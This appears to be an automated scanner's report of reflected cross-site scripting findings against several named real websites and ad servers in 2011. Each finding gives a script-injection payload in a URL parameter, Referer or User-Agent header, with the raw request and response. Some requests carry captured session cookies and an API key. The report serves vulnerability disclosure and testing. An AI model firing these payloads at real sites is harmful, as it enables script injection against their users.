<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/201115823"><script>alert(1)</script>9152561effe/young-futurists?gt1=38002"/> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1903c"><script>alert(1)</script>6042e8de7d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/2011/young-futurists1903c"><script>alert(1)</script>6042e8de7d9?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:18:12 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:13 GMT Date: Wed, 02 Feb 2011 16:18:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists1903c"><script>alert(1)</script>6042e8de7d9?gt1=38002"/> ...[SNIP]...
The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9263e"><script>alert(1)</script>7ef5e7e7b85 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/2011/young-futurists?gt1=380029263e"><script>alert(1)</script>7ef5e7e7b85 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:50 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:51 GMT Date: Wed, 02 Feb 2011 16:17:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 62036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists?gt1=380029263e"><script>alert(1)</script>7ef5e7e7b85"/> ...[SNIP]...
1.492. http://www.theroot.com/views/2011/young-futurists [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.theroot.com
Path:
/views/2011/young-futurists
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cfba"><script>alert(1)</script>c2fd8dd267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/2011/young-futurists?gt1=38002&1cfba"><script>alert(1)</script>c2fd8dd267f=1 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:55 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:56 GMT Date: Wed, 02 Feb 2011 16:17:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 62067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists?gt1=38002&1cfba"><script>alert(1)</script>c2fd8dd267f=1"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daeb9"><script>alert(1)</script>f3e0aacca45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /viewsdaeb9"><script>alert(1)</script>f3e0aacca45/meet-25-people-who-will-change-our-world?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:57 GMT Date: Wed, 02 Feb 2011 16:17:57 GMT Content-Length: 15186 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/viewsdaeb9"><script>alert(1)</script>f3e0aacca45/meet-25-people-who-will-change-our-world?gt1=38002"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f68f"%3b6502cd69799 was submitted in the REST URL parameter 2. This input was echoed as 1f68f";6502cd69799 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /views/meet-25-people-who-will-change-our-world1f68f"%3b6502cd69799?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:18:08 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:10 GMT Date: Wed, 02 Feb 2011 16:18:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49659
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 648c7"><script>alert(1)</script>e0cb09e666d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/meet-25-people-who-will-change-our-world648c7"><script>alert(1)</script>e0cb09e666d?gt1=38002 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:18:05 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:18:06 GMT Date: Wed, 02 Feb 2011 16:18:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 49871
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world648c7"><script>alert(1)</script>e0cb09e666d?gt1=38002"/> ...[SNIP]...
The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e7c"><script>alert(1)</script>6bc14871c67 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/meet-25-people-who-will-change-our-world?gt1=38002e4e7c"><script>alert(1)</script>6bc14871c67 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:48 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:49 GMT Date: Wed, 02 Feb 2011 16:17:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 65972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002e4e7c"><script>alert(1)</script>6bc14871c67"/> ...[SNIP]...
1.497. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.theroot.com
Path:
/views/meet-25-people-who-will-change-our-world
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4be"><script>alert(1)</script>542e90bad81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /views/meet-25-people-who-will-change-our-world?gt1=38002&1b4be"><script>alert(1)</script>542e90bad81=1 HTTP/1.1 Host: www.theroot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.63 (Unix) Last-Modified: Wed, 02 Feb 2011 16:17:52 GMT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 16:17:54 GMT Date: Wed, 02 Feb 2011 16:17:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 66003
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <meta name=" ...[SNIP]... <meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002&1b4be"><script>alert(1)</script>542e90bad81=1"/> ...[SNIP]...
1.498. http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.worldmastiffforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d11e2"><script>alert(1)</script>f6a009cb502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d11e2"><script>alert(1)</script>f6a009cb502=1 HTTP/1.1 Host: www.worldmastiffforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ffdd'-alert(1)-'44731edd2a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=160x600&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5ffdd'-alert(1)-'44731edd2a4
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:59 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 02 Feb 2011 19:17:59 GMT Content-Length: 522 Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a72ed'-alert(1)-'fb8e70772e6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=160x600§ion=429613 HTTP/1.1 Host: ad.harrenmedianetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a72ed'-alert(1)-'fb8e70772e6
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:17:55 GMT Content-Length: 600 Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7bea'-alert(1)-'540c8b7b243 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imp?Z=300x250&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e7bea'-alert(1)-'540c8b7b243
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:03 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Wed, 02 Feb 2011 19:18:03 GMT Content-Length: 515 Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11978'-alert(1)-'712c5dc792d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=601669 HTTP/1.1 Host: ad.scanmedios.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=11978'-alert(1)-'712c5dc792d
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/html; charset=utf-8 Date: Wed, 02 Feb 2011 19:18:01 GMT Content-Length: 600 Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c87df<script>alert(1)</script>93af6c2ba17 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: c87df<script>alert(1)</script>93af6c2ba17 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Wed, 02 Feb 2011 15:30:05 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 58 Connection: keep-alive
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload efdaf<script>alert(1)</script>44c02aedbc6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1 Host: api.bizographics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie; Referer: efdaf<script>alert(1)</script>44c02aedbc6
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Wed, 02 Feb 2011 16:18:36 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 58 Connection: Close
The value of the User-Agent HTTP header is copied into an HTML comment. The payload a5b3f--><script>alert(1)</script>e7875b8ff69 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /XBE/Popups/InfoPopup.aspx?hotel=11536&hotelgroup=5303&lang=1&view=28&shell=9adc412feca446b4bdccea9aa721a765&template=1e8778f11833464cb60925c02a37f3dd&room=ST1K&media=2666f74ea41c4e9db3ec8835549ad2a4&TB_iframe=true&width=400&height=400&modal=false HTTP/1.1 Host: gc.synxis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5b3f--><script>alert(1)</script>e7875b8ff69 Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 7852 Date: Tue, 01 Feb 2011 15:39:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script type="text/javascript" src=".. ...[SNIP]... <!-- Processing Time: 0.097028638920135 | Server: 32 | Client IP: 96.17.171.172 | Client User Agent: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5b3f--><script>alert(1)</script>e7875b8ff69" -->
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 9223a<a>b8515daf8ba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /XBE/Popups/InfoPopup.aspx HTTP/1.1 Host: gc.synxis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9223a<a>b8515daf8ba Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 174 Vary: Accept-Encoding Date: Tue, 01 Feb 2011 15:35:41 GMT Connection: close
<!-- Processing Time: 0.018823581552306 | Server: 32 | Client IP: 69.31.59.40 | Client User Agent: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9223a<a>b8515daf8ba" -->
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2736c--><script>alert(1)</script>d72e32cd699 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rez.aspx?&Chain=5303&start=16& HTTP/1.1 Host: gc.synxis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2736c--><script>alert(1)</script>d72e32cd699 Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Date: Tue, 01 Feb 2011 15:35:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 62635
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the User-Agent HTTP header is copied into an HTML comment. The payload a2727--><script>alert(1)</script>35328277103 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1 Host: gc.synxis.com Connection: keep-alive Referer: http://www.millenniumhotels.com/millenniumboston/index.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10a2727--><script>alert(1)</script>35328277103 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2932"><script>alert(1)</script>4fce17b3452 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
